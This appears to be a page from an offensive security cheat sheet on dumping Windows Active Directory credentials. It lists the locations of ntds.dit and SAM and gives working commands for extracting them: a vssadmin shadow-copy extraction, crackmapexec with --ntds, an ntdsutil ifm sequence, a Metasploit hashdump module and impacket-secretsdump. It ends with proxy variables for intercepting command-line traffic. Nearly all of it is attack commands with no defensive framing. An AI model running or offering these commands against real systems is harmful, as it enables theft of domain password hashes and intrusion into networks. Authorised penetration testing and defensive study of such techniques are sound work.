Others

other miscellaneous

Dump NTDS

NTDS file location

c:\windows\ntds\ntds.dit

Backup files if contain sam

Windows/system32/config/SAM

/WINDOWS/repair/SAM

regedit.exe HKEY_LOCAL_MACHINE -> SAM

Manual NTDS.dit Extraction using vssadmin

vssadmin create shadow /for=C: 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit 
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

Dump NTDS.dit with Crackmapexec

crackmapexec smb <target>-u admin -p Password123 -d domain --ntds drsuapi

ntdsutil

activate instance ntds 
ifm 
create full C:\ntdsutil 
quit 
quit

Get files from:

c:\ntdsutil\active directory

Metasploit

windows/gather/credentials/domain_hashdump

Impacket

impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL

Intercept Linux CLI Traffic

https://frichetten.com/blog/intercept-linux-cli-tool-traffic/

export http_proxy="http://192.168.122.1:8080" 
export https_proxy="http://192.168.122.1:8080"

Previousmsfvenom

Last updated 4 years ago

Was this helpful?